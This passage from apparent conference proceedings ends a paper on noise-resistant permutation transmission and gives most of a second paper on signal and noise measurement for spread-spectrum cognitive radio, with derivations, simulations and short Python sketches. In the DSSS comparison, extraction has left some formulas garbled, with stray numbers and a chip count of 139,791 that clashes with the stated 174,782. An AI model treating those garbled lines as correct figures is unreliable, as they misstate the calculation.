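        # Stage 4: accept the unique letter within Hamming distance d_lim.
        matches = [k for k, L in enumerate(letters) if hamming(r, L) <= d_lim]
        if len(matches) != 1:
            return None
        decoded.append(matches[0])
    # Stage 5: the positions must name pairwise distinct letters (a permutation).
    return decoded if len(set(decoded)) == len(decoded) else None
```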
3 Experiments

To test the efficiency of the developed method for reliable permutation transmission, a software model has been constructed. Figure 4 shows the operation algorithm of the model's data receiver. In accordance with Remark 3, in the model example the word W is formed of N = 23 letters, which are the non-zero circular shifts $L_j$, where 1 ≤ j ≤ 23, of a permutation of length M = 8. The value $L_0$ = (0,1,7,3,2,5,4,6) = (000,001,111,011,010,101,100,110). The communication channel in the model example is binary symmetric, and the bit errors are independent.
4 Results

Figure 5 shows the graphs reflecting the experimentally determined (in 1,000 trials) dependencies of the relative frequencies of a word and a letter being received correctly on a fixed number of accumulated fragments l for the bit error probability $p_0 = 0.4$.
Fig. 4. Data receiver algorithm
Fig. 5. Relative frequencies of a word and a letter being received correctly, depending on a fixed number of accumulated fragments
In addition, in Fig. 5, the markers indicate the corresponding graphs of the theoretical dependencies of $P_{L\_true}$ and $P_{W\_true}$ on l in accordance with Eqs. (2) and (3). The theoretical and experimental dependences in Fig. 5 are consistent according to the Pearson criterion, with achieved significance levels (p-values [28]) close to unity. This correspondence between the theoretical and experimental dependences is also observed for other values of $p_0$. All of the above indicates that the constructed data transmission model is correct. Figure 6 shows the experimentally determined relative frequency of a word being received correctly, depending on the number of accumulated fragments l, for the bit error probability $p_0 = 0.495$. In addition, Fig. 6 shows the estimate $P_{W\_true\_final}(l)$ of the probability of a word being received correctly, calculated according to Eq. (13), for $p_0 = 0.495$.
Fig. 6. Relative frequency of a word being received correctly, depending on the number of accumulated fragments
An analysis of the results shown in Fig. 6 confirms the validity of estimate (13). Note, however, that this estimate is rather rough.

Remark 8. Cases of a word being received incorrectly did not occur in 10,000 trials during the experimental study of the developed method for $p_0 \le 0.495$.

Figure 7 shows the experimentally determined probabilistic indicators of a word being received correctly with the bit error probability $p_0 \le 0.495$. The following section will discuss the situation when the bit error probability exceeds $p_0 = 0.495$, while the data transmission system is designed for $p_0 \le 0.495$ and generates a communication channel failure signal when it is impossible to receive the transmitted word for the maximum accumulation factor $l_{max}$. In the model example considered here, $l_{max}$ is calculated to provide $P_{W\_true} \ge 0.999$ at $p_0 = 0.495$. The dependences in Fig. 8 show the experimentally determined probabilistic indicators of a word being received correctly at the bit error probability $p_0 \ge 0.495$.
Fig. 7. Relative frequency of a word being received correctly, depending on the number of accumulated fragments, for p0 ≤ 0.495: (a) p0 ≤ 0.4; (b) p0 ≥ 0.43
Figure 8 indicates that when the bit error probability exceeds the limit value (for the considered model example, $p_0 = 0.495$), the requirements on the probability of the word being received correctly are not fulfilled. For example, the relative frequency of a word being received correctly with an accumulation factor $l_{max}$ equals 0.9966 for $p_0 = 0.496$ and 0.5454 for $p_0 = 0.497$. For $p_0 = 0.498$, cases of the transmitted words being received correctly were not observed in 10,000 trials during the experimental study. Note also that cases of a word being received incorrectly did not occur in 10,000 trials for $p_0 = 0.496$, $p_0 = 0.497$, and $p_0 = 0.498$.
Fig. 8. Relative frequency of a word being received correctly, depending on the number of accumulated fragments, for p0 ≥ 0.495
Figure 9 shows the average number of accumulated fragments required to receive a word correctly, as a function of the bit error rate.
Fig. 9. Average number of accumulated fragments required to receive a word correctly, depending on bit error rate
The graph in Fig. 9 indicates the exponential nature of the increase observed in the average number of accumulated fragments.
5 Discussion

The efficiency of the developed method for reliable permutation transmission has been confirmed by the model example demonstrating the method implementation for M = 8, n = 24, N = 23, $P_{W\_true\_final} \ge 0.999$ with the maximum allowable bit error probability $p_0 = 0.495$ and $l_{max} = 36,413$. However, when designing a communication system, other values may be set for the length N of the transmitted permutation, as well as for the minimum probability $P_{W\_true}$ of its correct reception. In this case, a permutation π of length M, where $\lceil \log_2 M \rceil \cdot M \ge N$, may be selected as the base permutation to form the N letters. The permutation π must then satisfy the requirements set in Definition 1. The probability $P_{W\_true}$ will determine the limiting value of the accumulation factor $l_{max}$ based on Eq. (3). Since $P_{L\_true} < 1$, Eq. (3) implies that $P_{W\_true}$ increases with decreasing N. Therefore, the requirements that ensure the set probability $P_{W\_true}$ of a permutation being received correctly are achievable for any M with $\lceil \log_2 M \rceil \cdot M \ge N$. Selecting optimal values of {N, M} to achieve the necessary probabilistic indicators of the data transmission system is beyond the scope of this study, but may become of interest for further research. In addition, the developed method for reliable permutation transmission is similar to the principles of constructing a noise-like signal (when using direct sequence spread spectrum, DSSS) in terms of representing each letter of a word by a certain bit sequence. Here, we compare the probabilistic characteristics of these two methods. For the model example of this study, each word W is a permutation of length N = 23 and is encoded by a sequence consisting of 23·24 = 552 bits. At the same time, to ensure $P_{W\_true\_final} \ge 0.999$ and $P_{W\_false\_final} \le 3.6 \cdot 10^{-4}$ at $p_0 = 0.495$, an accumulation factor $l_{max}$ is required. Such an accumulation factor requires a transfer of 552 · 36,413 = 20,099,976 bits. For a traditional DSSS system, each permutation bit is transmitted through the channel as a sequence consisting of B chips. Let the permutation W symbols be encoded by a fixed-length binary code. Then the codeword length for each permutation symbol for N = 23 is equal to $\lceil \log_2 23 \rceil = 5$ bits, and the permutation length is equal to 115 bits. To ensure the same channel rate for DSSS, each bit of the permutation W is represented by B = 20,099,976/115 = 174,782 chips. Having discussed the above, we now determine the bit error probability of the DSSS method with the given parameters. Suppose that two-position phase shift keying is used during transmission. The bit error rate of BPSK under additive white Gaussian noise can be calculated as
$p_0 = Q\left( \sqrt{\frac{2E_b}{N_0}} \right),$  (18)

where $Q(x) = \frac{1}{\sqrt{2\pi}} \int_{x}^{\infty} e^{-t^2/2} \, dt$ is the complementary Gaussian error function, $E_b$ is the energy per bit, and $\frac{1}{2}N_0$ is the noise power spectral density. When using DSSS, the bit error rate in the word W is equal to $p_0(W) = Q\left( \sqrt{\frac{2BE_b}{N_0}} \right).$
20,099,976 115
= 139,791. In this case, p0 (W ) = Q
2BEb N0
=
and PW _true_DSSS = (1 − p0 (W )) = 0.9998. The results indicate a higher probability of a word being received correctly ensured by the developed method as compared to the DSSS method in case of the model example considered here. At the same time, further research is required to compare the indicators offered by the above methods and to form definitive conclusions. 115
6 Conclusions The present study develops a method for reliable permutation transmission that can be used in communication systems with non-separable factorial coding, in particular, to implement a three-pass cryptographic protocol based on permutations. The proposed method uses circular shifts of the carrier permutation to represent each character (letter) in the transmitted permutation (word). The carrier permutation is a permutation that has the maximum value of the minimum Hamming distance from its binary representation to all its circular shifts. The receiver implements the majority and correlation processing of the fragments received from the communication channel. The fragment length is equal to the letter length. This processing makes it possible to realize a reliable transmission of a word under the influence of high-intensity channel noise. An algorithm that applies the proposed method has been developed and implemented. A simulation software model of the data transmission system has been constructed. An analysis of the model’s performance confirms that the above theoretical evaluations are veracious. In addition, a comparative analysis of the experimentally obtained probability to receive an error-free permutation for the developed method and the corresponding probability for the DSSS method at equal transmission rate and bit error rate in the communication channel p0 = 0.495 confirms the effectiveness of the developed method.
194
E. Faure et al.
Acknowledgements. This research was funded from the Ministry of Education and Science of Ukraine under grant 0120U102607.
References
1. Avizienis, A., Laprie, J.-C., Randell, B.: Fundamental Concepts of Dependability. Department of Computing Science, University of Newcastle upon Tyne, Newcastle upon Tyne (2001)
2. Pfleeger, C.P., Pfleeger, S.L., Margulies, J.: Security in Computing. Prentice Hall, Upper Saddle River (2015)
3. Bishop, M., Sullivan, E., Ruppel, M.: Computer Security: Art and Science. Addison-Wesley, Boston (2019)
4. Yin, L., Fang, B., Guo, Y., Sun, Z., Tian, Z.: Hierarchically defining Internet of Things security: from CIA to CACA. Int. J. Distrib. Sens. Netw. 16, 155014771989937 (2020). https://doi.org/10.1177/1550147719899374
5. Al-Azzeh, J.S., Ayyoub, B., Faure, E., Shvydkyi, V., Kharin, O., Lavdanskyi, A.: Telecommunication systems with multiple access based on data factorial coding. Int. J. Commun. Antenna Propag. 10, 102–113 (2020). https://doi.org/10.15866/irecap.v10i2.17216
6. Bana, A.-S., Trillingsgaard, K.F., Popovski, P., de Carvalho, E.: Short packet structure for ultra-reliable machine-type communication: tradeoff between detection and decoding. In: 2018 IEEE International Conference on Acoustics, Speech and Signal Processing (ICASSP), pp. 6608–6612. IEEE, Calgary, AB (2018). https://doi.org/10.1109/ICASSP.2018.8461650
7. Feng, C., Wang, H.: Secure short-packet communications at the physical layer for 5G and beyond (2021). https://doi.org/10.48550/ARXIV.2107.05966
8. Feng, C., Wang, H.-M., Poor, H.V.: Reliable and secure short-packet communications. IEEE Trans. Wirel. Commun. 21, 1913–1926 (2022). https://doi.org/10.1109/TWC.2021.3108042
9. Faure, E.V.: Factorial coding with data recovery. Visnyk Cherkaskogo Derzhavnogo Tehnol. Univ. 2, 33–39 (2016)
10. Faure, E.V.: Factorial coding with error correction. Radio Electron. Comput. Sci. Control. 3, 130–138 (2017). https://doi.org/10.15588/1607-3274-2017-3-15
11. Faure, E., Shcherba, A., Stupka, B.: Permutation-based frame synchronisation method for short packet communication systems. In: 2021 11th IEEE International Conference on Intelligent Data Acquisition and Advanced Computing Systems: Technology and Applications (IDAACS), pp. 1073–1077. IEEE, Cracow, Poland (2021). https://doi.org/10.1109/IDAACS53288.2021.9660996
12. Al-Azzeh, J., Faure, E., Shcherba, A., Stupka, B.: Permutation-based frame synchronization method for data transmission systems with short packets. Egypt. Inform. J. (2022). https://doi.org/10.1016/j.eij.2022.05.005
13. Lee, B., Park, S., Love, D.J., Ji, H., Shim, B.: Packet structure and receiver design for low latency wireless communications with ultra-short packets. IEEE Trans. Commun. 66, 796–807 (2018). https://doi.org/10.1109/TCOMM.2017.2755012
14. Lee, H., Ko, Y.-C.: Physical layer enhancements for ultra-reliable low-latency communications in 5G new radio systems. IEEE Commun. Stand. Mag. 5, 112–122 (2021). https://doi.org/10.1109/MCOMSTD.0001.2100002
15. Park, J., et al.: Extreme ultra-reliable and low-latency communication. Nat. Electron. 5, 133–141 (2022). https://doi.org/10.1038/s41928-022-00728-8
16. Li, Y., Huynh, D.V., Do-Duy, T., Garcia-Palacios, E., Duong, T.Q.: Unmanned aerial vehicle-aided edge networks with ultra-reliable low-latency communications: a digital twin approach. IET Signal Process. 1–12 (2022). https://doi.org/10.1049/sil2.12128
17. Traßl, A., et al.: Outage prediction for ultra-reliable low-latency communications in fast fading channels. EURASIP J. Wirel. Commun. Netw. 2021(1), 1–25 (2021). https://doi.org/10.1186/s13638-021-01964-w
18. Wang, K., Pan, C., Ren, H., Xu, W., Zhang, L., Nallanathan, A.: Packet error probability and effective throughput for ultra-reliable and low-latency UAV communications. IEEE Trans. Commun. 69, 73–84 (2021). https://doi.org/10.1109/TCOMM.2020.3025578
19. Schneier, B.: Applied Cryptography: Protocols, Algorithms, and Source Code in C. Wiley, New York (1996)
20. Nguyen, D.M., Kim, S.: A quantum three pass protocol with phase estimation for many bits transfer. In: 2019 International Conference on Advanced Technologies for Communications (ATC), pp. 129–132. IEEE, Hanoi, Vietnam (2019). https://doi.org/10.1109/ATC.2019.8924514
21. Badawi, A., Zarlis, M., Suherman, S.: Impact three pass protocol modifications to key transmission performance. J. Phys. Conf. Ser. 1235, 012050 (2019). https://doi.org/10.1088/1742-6596/1235/012050
22. Moldovyan, A., Moldovyan, D., Moldovyan, N.: Post-quantum commutative encryption algorithm. Comput. Sci. J. Mold. 81, 299–317 (2019)
23. Shcherba, A., Faure, E., Lavdanska, O.: Three-pass cryptographic protocol based on permutations. In: 2020 IEEE 2nd International Conference on Advanced Trends in Information Theory (ATIT), pp. 281–284. IEEE, Kyiv, Ukraine (2020). https://doi.org/10.1109/ATIT50783.2020.9349343
24. Peterson, W.W., Weldon, E.J.: Error-Correcting Codes. MIT Press, Cambridge (1972)
25. MacWilliams, F.J., Sloane, N.J.A.: The Theory of Error Correcting Codes. North Holland Publishing Co. (1977)
26. Morelos-Zaragoza, R.H.: The Art of Error Correcting Coding. John Wiley, Chichester (2006)
27. Huffman, W.C., Pless, V.: Fundamentals of Error-Correcting Codes. Cambridge University Press, Cambridge (2010)
28. Bassham III, L.E., et al.: A Statistical Test Suite for Random and Pseudorandom Number Generators for Cryptographic Applications. Special Publication (NIST SP) 800-22 Rev 1a. National Institute of Standards & Technology, Gaithersburg, MD, USA (2010)
Intelligent Signal Measurement Technique for Spread Spectrum Software Defined Cognitive Radio Systems Oleksii Holubnychyi(B) , Maksym Zaliskyi, Anatolii Taranenko, Yevhen Gabrousenko, and Olga Shcherbyna National Aviation University, Kyiv, Ukraine [email protected]
Abstract. The paper proposes an intelligent signal measurement technique for spread spectrum software defined cognitive radio systems. The main feature of the technique is that it works at the physical layer of wideband radio systems, which use orthogonal components (e.g., Walsh codes), and multi-position signals (e.g., QAM). The level of multiplicative noise (slow fading) and the variance of additive noise are subject to evaluation in the proposed measurement technique. The technique is based on the indirect measurement approach and the correlation method, and also uses a signal processing system with a set of mutually non-correlated measurement signals and interior parameters that are additionally formed and used in the technique. These parameters influence the accuracy of measurement, which is the criterion for an unsupervised adaptive tuning in the proposed technique. The adaptive tuning defines an intelligent component of the proposed technique. A detailed analysis of accuracy of measurement for the proposed technique is also presented in the paper. Keywords: Spread spectrum communications · Software defined radio · Cognitive radio · Signal measurement · Intelligent system
1 Introduction

Intelligent systems and techniques that deal with signal processing and, in particular, signal measurement are known in the field of information and communications technology, e.g., measurements and statistical analyses of electromagnetic noise for industrial wireless communications [1], fuzzy decision trees embedded with evolutionary fuzzy clustering for locating users using wireless signal strength in an indoor environment [2], intelligent signal processing in an automated measurement data analysis system [3], and others. Signal measurement techniques are in considerable demand for wideband low-power communications, which are characterized by relatively low values of signal-to-noise ratio, such as spread spectrum communications [4], wireless long-distance and low-power networks (LPWAN) and the LoRa (Long Range) protocol [5], and some cognitive radio and modern intelligent radio concepts [6]. The problem of signal and noise level
estimation in a receiver when complex signal and code structures, e.g., complementary sequences [7–9], are used arises in these kinds of wireless communications. Optimal values of thresholds during signal processing depend on prior data on signal and noise levels, and they influence the efficiency of data transfer and processing in general. The kind of intelligent signal measurement technique dealt with in this paper is an unsupervised signal measurement that can be tuned automatically using the criterion of minimum symbol error rate (and, as a consequence, bit error rate) during the processing of spread spectrum signals with multi-level modulation (e.g., QAM) [10] and variable parameters (one of the features of cognitive radio systems) in software defined radio (SDR) receiving equipment [11–13]. These peculiarities of signal measurement define the relevance of the signal processing technique proposed in this paper for modern SDR applications, where measurements are carried out directly at the physical layer of radio systems. The most promising intelligent signal measurement techniques in the field of information and communications technology, in particular for electromagnetic compatibility purposes, take into account indirect measurement approaches (e.g., [14]). In this case, the accuracy of measurement is a subject of detailed analysis, taking into account a mathematical model of signal and code structures in a spread spectrum cognitive radio system. Moreover, the parameters that characterize this accuracy can be used in an intelligent signal measurement technique as the criterion for its unsupervised adaptive tuning, depending on input signal and noise parameters. In this regard, the aim of the paper is to propose an intelligent signal measurement technique for spread spectrum SDR cognitive radio systems that takes into account a mathematical description of spread spectrum signals with multi-level modulation and a possible variability of their parameters, and also uses the accuracy of measurement for unsupervised adaptive tuning. The rest of the paper is organized as follows: Sect. 2 presents materials and methods, including a description of the mathematical model of the signals to be measured, the development of an intelligent signal measurement technique for spread spectrum SDR cognitive radio systems, and an analysis of the features and peculiarities of this technique; Sect. 3 describes experiments consisting of two examples; the results are shown in Sect. 4; Sect. 5 contains a discussion, including a detailed analysis of the accuracy of measurement for the proposed technique; and, finally, Sect. 6 presents the conclusions.
2 Materials and Methods

2.1 Mathematical Model of Signals to be Measured

Let the spread spectrum signal with the processing gain G (the ratio between the transmission bandwidth and the data bandwidth) be the sum of N orthogonal components:

S(t) = Σ_{n=1}^{N} S_n(t), (1)

where each orthogonal component can be expressed as

S_n(t) = a_n(t) x_n(t), n = 1, …, N. (2)
In expression (2), a_n(t) denotes bipolar discrete values (symbols), which are transferred using the reference signals x_n(t). The system of signals x_n(t), n = 1, …, N, is orthogonal, i.e.

∫_{t∈τ} x_i(t) x_j(t) dt = 0, i ≠ j, i = 1, …, N, j = 1, …, N,

where τ is the duration of one transferred symbol. The signal structure given by expressions (1) and (2) also matches the physical layer of various wideband radio systems that use orthogonal components, e.g., Walsh or Gold codes, the sine and cosine components of QAM modulation, the orthogonal subcarriers of OFDM, etc. For binary communication systems a_n(t) = ±1, whereas for communication systems with multi-position signals a_n(t) can take a number of discrete values, e.g., a_n(t) ∈ {±1; ±3; ±5; ±7} for QAM-64. A signal at the input of spread spectrum SDR receiving equipment can be expressed as

Z(t) = μ S(t) + η(t), (3)
where μ is the multiplicative noise component, whose level is constant over τ (slow fading), i.e. μ(t | t ∈ τ) = μ, and η(t) is additive noise. The value of μ and the variance σ²_η of the additive noise are the quantities to be estimated by the technique developed in this paper.

2.2 Developing the Technique

Let us analyze the result of correlation-based processing of the input signal Z(t) in a signal processing system for the n-th orthogonal component, which can be represented by the expression

E_m = ∫_{t∈τ} [K_m Z(t) + η̃_m(t)] [L_m x_n(t) + ξ̃_m(t)] dt, (4)
where K_m and L_m are amplification (attenuation) coefficients applied to Z(t) and x_n(t), respectively, and η̃_m(t), ξ̃_m(t) are mutually non-correlated signals on the time interval t ∈ τ, which are formed additionally in the signal processing system and whose properties are close to white noise; m = 1, 2 (i.e., the considered signal processing system consists of two processing units). Transforming expression (4), we obtain

E_m = μ K_m L_m ∫_{t∈τ} x_n(t) S(t) dt + K_m L_m ∫_{t∈τ} x_n(t) η(t) dt + μ K_m ∫_{t∈τ} S(t) ξ̃_m(t) dt + K_m ∫_{t∈τ} η(t) ξ̃_m(t) dt + L_m ∫_{t∈τ} x_n(t) η̃_m(t) dt + ∫_{t∈τ} η̃_m(t) ξ̃_m(t) dt. (5)
In SDR signal processing technology, expression (5) is implemented through the corresponding signal samples. In this case, each signal-code construction can be represented on the time interval t ∈ τ by means of G samples:

Ẽ_m = μ K_m L_m Σ_{k=1}^{G} x_{n,k} S_k + K_m L_m Σ_{k=1}^{G} x_{n,k} η_k + μ K_m Σ_{k=1}^{G} S_k ξ̃_{m,k} + K_m Σ_{k=1}^{G} η_k ξ̃_{m,k} + L_m Σ_{k=1}^{G} x_{n,k} η̃_{m,k} + Σ_{k=1}^{G} η̃_{m,k} ξ̃_{m,k}. (6)
Consider the first term in expression (6), provided that the signals x_n(t), n = 1, …, N, form an orthogonal basis:

μ K_m L_m Σ_{k=1}^{G} x_{n,k} S_k = μ K_m L_m Σ_{k=1}^{G} a_n x²_{n,k} = μ K_m L_m a_n G σ²_{x_n}, (7)
where a_n are the bipolar discrete values (symbols) transferred using the reference signals x_n(t) on the current time interval t ∈ τ, and σ²_{x_n} is the variance of the reference signals x_n(t). Taking (7) into account, expression (6) can be written in the form

Ẽ_m = μ K_m L_m a_n G σ²_{x_n} + K_m L_m Σ_{k=1}^{G} x_{n,k} η_k + μ K_m Σ_{k=1}^{G} S_k ξ̃_{m,k} + K_m Σ_{k=1}^{G} η_k ξ̃_{m,k} + L_m Σ_{k=1}^{G} x_{n,k} η̃_{m,k} + Σ_{k=1}^{G} η̃_{m,k} ξ̃_{m,k}. (8)
Let us estimate the variance σ²_{Ẽ_m} of the response of the signal processing system (4) for the case when M symmetric amplitude levels can be realized equiprobably in each n-th component S_n(t) = a_n(t) x_n(t), n = 1, …, N, i.e.

a_n = a_{n,l} ∈ {±a_{n,1}; ±a_{n,2}; …; ±a_{n,M/2−1}; ±a_{n,M/2}}, l = 1, …, M.

The variance of the response of the signal processing system (4), which has the form (8), taking into account theorems on the numerical characteristics of functions of random variables (in particular, the theorem on the shift by a non-random variable, the theorem on the variance of a linear function, and the theorem on the variance of a product of independent random variables [15, 16]), can be expressed as

σ²_{Ẽ_m} = (μ² K²_m L²_m G² σ⁴_{x_n} / M) Σ_{l=1}^{M} a²_{n,l} + (μ² K²_m G N σ²_{x_n} σ²_{ξ̃_m} / M) Σ_{l=1}^{M} a²_{n,l} + K²_m L²_m G σ²_{x_n} σ²_η + K²_m G σ²_η σ²_{ξ̃_m} + L²_m G σ²_{x_n} σ²_{η̃_m} + G σ²_{η̃_m} σ²_{ξ̃_m} = [(K²_m G σ²_{x_n} / M) Σ_{l=1}^{M} a²_{n,l} (L²_m G σ²_{x_n} + N σ²_{ξ̃_m})] μ² + K²_m G (L²_m σ²_{x_n} + σ²_{ξ̃_m}) σ²_η + G σ²_{η̃_m} (L²_m σ²_{x_n} + σ²_{ξ̃_m}). (9)
Let us introduce the following notation system:

A_m = (K²_m G σ²_{x_n} / M) Σ_{l=1}^{M} a²_{n,l} (L²_m G σ²_{x_n} + N σ²_{ξ̃_m});
B_m = K²_m G (L²_m σ²_{x_n} + σ²_{ξ̃_m});
C_m = G σ²_{η̃_m} (L²_m σ²_{x_n} + σ²_{ξ̃_m});
D_m = σ²_{Ẽ_m}. (10)
Using the notation system (10) for expression (9) and taking into account that the considered signal processing system consists of two processing units (m = 1, 2), the following system of equations is obtained:

D_1 = A_1 μ² + B_1 σ²_η + C_1,
D_2 = A_2 μ² + B_2 σ²_η + C_2. (11)

The unknown variables in system (11) are μ and σ²_η, i.e. the values that are subject to evaluation in the proposed technique. A solution of system (11) in the general case can be written in the form:

μ_{1,2} = ± √((A_1 B_2 − B_1 A_2)(B_1 C_2 − B_1 D_2 − C_1 B_2 + D_1 B_2)) / (A_1 B_2 − B_1 A_2);
σ²_η = (A_2 C_1 − A_2 D_1 − C_2 A_1 + D_2 A_1) / (A_1 B_2 − B_1 A_2). (12)
The sign "±" for μ in expression (12) has a simple physical meaning: if the signal passes through the communication channel without inversion, then μ > 0, and if with inversion, then μ < 0. The power of the useful signal, which is a part of the power of the useful signal with additive noise at the input of the spread spectrum SDR receiving equipment (3), is proportional to μ² and does not depend on the sign of μ. The signal processing scheme that implements the proposed signal measurement technique for spread spectrum SDR cognitive radio systems is shown in Fig. 1. Note that the intelligent component of the technique depends on the accuracy of measurement (i.e., the accuracy of estimation of μ and σ²_η); this is analyzed below in the paper.

2.3 Features and Peculiarities of the Technique

As can be seen from system (12), the expressions for μ and σ²_η have the same denominators. With this in mind, the proposed technique is able to work when the following condition is met:

A_1 B_2 − B_1 A_2 ≠ 0. (13)
Fig. 1. Signal processing scheme which implements the proposed signal measurement technique
Consequently, the set of parameters for which the technique does not work is defined by the condition:

A_1 B_2 − B_1 A_2 = 0. (14)
To analyze it, let us solve the parametric Eq. (14), taking into account the previously introduced notation system (10) for the coefficients A_1, B_1, A_2, B_2:

(K²_1 K²_2 G² σ²_{x_n} / M) Σ_{l=1}^{M} a²_{n,l} (L²_1 G σ²_{x_n} + N σ²_{ξ̃_1})(L²_2 σ²_{x_n} + σ²_{ξ̃_2}) − (K²_1 K²_2 G² σ²_{x_n} / M) Σ_{l=1}^{M} a²_{n,l} (L²_2 G σ²_{x_n} + N σ²_{ξ̃_2})(L²_1 σ²_{x_n} + σ²_{ξ̃_1}) = 0. (15)

Simplifying (15), we obtain

(K²_1 K²_2 G² σ²_{x_n} / M) Σ_{l=1}^{M} a²_{n,l} [(L²_1 G σ²_{x_n} + N σ²_{ξ̃_1})(L²_2 σ²_{x_n} + σ²_{ξ̃_2}) − (L²_2 G σ²_{x_n} + N σ²_{ξ̃_2})(L²_1 σ²_{x_n} + σ²_{ξ̃_1})] = 0. (16)
Since the coefficients K_1 ≠ 0 and K_2 ≠ 0, the processing gain G ≠ 0, the power of each reference signal σ²_{x_n} ≠ 0, and the variance of the symmetric amplitude levels (1/M) Σ_{l=1}^{M} a²_{n,l} ≠ 0, expression (16) can be reduced to

(L²_1 G σ²_{x_n} + N σ²_{ξ̃_1})(L²_2 σ²_{x_n} + σ²_{ξ̃_2}) − (L²_2 G σ²_{x_n} + N σ²_{ξ̃_2})(L²_1 σ²_{x_n} + σ²_{ξ̃_1}) = 0. (17)

Expression (17) can be written in the following form:

σ²_{x_n} (G − N)(L²_1 σ²_{ξ̃_2} − L²_2 σ²_{ξ̃_1}) = 0. (18)

Taking into account that σ²_{x_n} ≠ 0, the solution of the parametric Eq. (14) is:

(G = N) ∨ (L²_1 σ²_{ξ̃_2} = L²_2 σ²_{ξ̃_1}). (19)

Consequently, the proposed signal measurement technique is able to work when the following condition is met:

(G ≠ N) ∧ (L²_1 σ²_{ξ̃_2} ≠ L²_2 σ²_{ξ̃_1}). (20)
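Condition (20) can be checked programmatically before any measurement is attempted. The following minimal Python sketch is illustrative and not part of the original technique; the exact-equality comparison is adequate here because the parameters are design choices rather than measured floats:

```python
def is_workable(G: int, N: int, L1: float, L2: float,
                var_xi1: float, var_xi2: float) -> bool:
    """Condition (20): G != N and L1^2 * var_xi2 != L2^2 * var_xi1."""
    return (G != N) and (L1**2 * var_xi2 != L2**2 * var_xi1)

# With L1 = L2 and equal xi-noise variances the condition fails, which is
# why Example 1 below uses L1 = 1, L2 = 2:
print(is_workable(G=24, N=3, L1=1.0, L2=1.0, var_xi1=1.0, var_xi2=1.0))  # False
print(is_workable(G=24, N=3, L1=1.0, L2=2.0, var_xi1=1.0, var_xi2=1.0))  # True
```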
3 Experiments

Pilot testing of the proposed technique is implemented using simulation. This is the most relevant way of experimental verification, since the proposed technique is focused on a software implementation in various spread spectrum SDR radio systems. Two examples of simulation follow.

Example 1. The parameters of the physical layer in the wideband radio system are: G = 24, N = 3, a_n = ±1, n = 1, …, N, M = 2. These parameters correspond to the physical layer of a wideband radio system that uses 3 multiplicative complementary binary signal-code constructions [7]. Let the signal-code constructions be transferred using orthogonal components with σ²_{x_n} = 1, n = 1, …, N.

1. The parameters of the channel model are μ = 0.15 and σ²_η = 5.
2. The parameters of the signal processing scheme, which is based on the proposed signal measurement technique, are: K_1 = K_2 = 1, L_1 = 1, L_2 = 2, and σ²_{ξ̃} = σ²_{η̃} = 1 for the two processing units (m = 1, 2). Note that parameter values equal to 1 effectively remove the corresponding multipliers from the signal processing scheme in Fig. 1 and thus simplify it. However, setting all of K_1, K_2, L_1, L_2 to 1 would violate condition (20), so at least L_1 ≠ L_2 must be respected.
3. The obtained intermediate measurement results in the signal processing scheme are σ²_{Ẽ_1} = 303 and σ²_{Ẽ_2} = 773.
Example 2.

1. The parameters of the physical layer of the wideband radio system and the parameters of the channel model are the same as in Example 1.
2. The parameters of the signal processing scheme are: K_1 = K_2 = 1, L_1 = 1, L_2 = 3, and σ²_{ξ̃} = σ²_{η̃} = 1 for the two processing units (m = 1, 2). Thus, Example 2 makes it possible to study the sensitivity to changes of the parameters L_1 and L_2.
3. The obtained intermediate measurement results in the signal processing scheme are σ²_{Ẽ_1} = 303 and σ²_{Ẽ_2} = 1,558. In this case, only the value of σ²_{Ẽ_2} changes, which is explained by the fact that the modified parameter L_2 corresponds to the second processing unit of the signal processing scheme.
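A simulation of this kind can be reproduced, for instance, with the following Python sketch. It is only an approximation of the described setup: scipy's Hadamard (Walsh) rows serve as a stand-in orthogonal basis, so G = 32 here rather than the G = 24 multiplicative complementary constructions of [7]; the remaining parameters follow Example 1. The empirical variances of the two processing-unit responses are compared with the theoretical values D_m = A_m μ² + B_m σ²_η + C_m from (10)-(11):

```python
import numpy as np
from scipy.linalg import hadamard

rng = np.random.default_rng(1)
G, N = 32, 3
X = hadamard(G)[1:N + 1, :].astype(float)   # N orthogonal +/-1 references, var = 1
mu, var_eta = 0.15, 5.0
K, L = (1.0, 1.0), (1.0, 2.0)
trials = 20_000

E = np.zeros((2, trials))
for t in range(trials):
    a = rng.choice([-1.0, 1.0], size=N)                  # binary symbols (M = 2)
    S = a @ X                                            # composite signal, eq. (1)
    Z = mu * S + rng.normal(0, np.sqrt(var_eta), G)      # channel model, eq. (3)
    for m in range(2):
        eta_m = rng.normal(0, 1, G)                      # auxiliary noise eta~_m
        xi_m = rng.normal(0, 1, G)                       # auxiliary noise xi~_m
        E[m, t] = np.sum((K[m] * Z + eta_m) * (L[m] * X[0] + xi_m))  # eq. (6), n = 1

for m in range(2):
    A = K[m]**2 * G * (L[m]**2 * G + N)    # eq. (10) with var_x = var_xi = 1
    B = K[m]**2 * G * (L[m]**2 + 1)
    C = G * (L[m]**2 + 1)
    D_theory = A * mu**2 + B * var_eta + C
    print(f"unit {m + 1}: empirical D = {E[m].var():.0f}, theory = {D_theory:.0f}")
```

With G = 32 the theoretical responses are D_1 ≈ 409 and D_2 ≈ 1054, and the empirical variances converge to these values as the number of trials grows.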
4 Results

The following results are obtained in the considered simulation examples.

In Example 1:
1. The values of the parameters in the notation system (10) and in the signal processing scheme are: A_1 = 648, A_2 = 2,376, B_1 = 48, B_2 = 120, C_1 = 48, C_2 = 120, D_1 = 303, and D_2 = 773.
2. The estimated parameters are μ = 0.143 and σ²_η = 5.036. Note that for this example A_1 B_2 − B_1 A_2 < 0 in expression (12); because of that, the sign "−" must be used when calculating the parameter μ by means of expression (12). Furthermore, B_1 = C_1 and B_2 = C_2, which follows from the condition K²_m = σ²_{η̃_m} for the two processing units (m = 1, 2); this fact simplifies calculating the parameters μ and σ²_η.

In Example 2:
1. The values of the parameters in the notation system (10) and in the signal processing scheme are: A_1 = 648, A_2 = 5,256, B_1 = 48, B_2 = 240, C_1 = 48, C_2 = 240, D_1 = 303, and D_2 = 1,558.
2. The estimated parameters are μ = 0.146 and σ²_η = 5.025.
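For verification, the closed-form estimator (12) can be evaluated directly on the coefficients reported above. A small Python sketch reproduces the Example 1 figures (μ ≈ 0.143, σ²_η ≈ 5.036); the sign handling is folded into the square root of the ratio, so only the physical channel-inversion sign remains as an input:

```python
import math

def estimate(A1, B1, C1, D1, A2, B2, C2, D2, sign=+1):
    """Solve system (11) for mu and var_eta via the closed form (12)."""
    den = A1 * B2 - B1 * A2
    num_mu = B1 * C2 - B1 * D2 - C1 * B2 + D1 * B2
    mu = sign * math.sqrt(num_mu / den)       # sign: +1 for a non-inverting channel
    var_eta = (A2 * C1 - A2 * D1 - C2 * A1 + D2 * A1) / den
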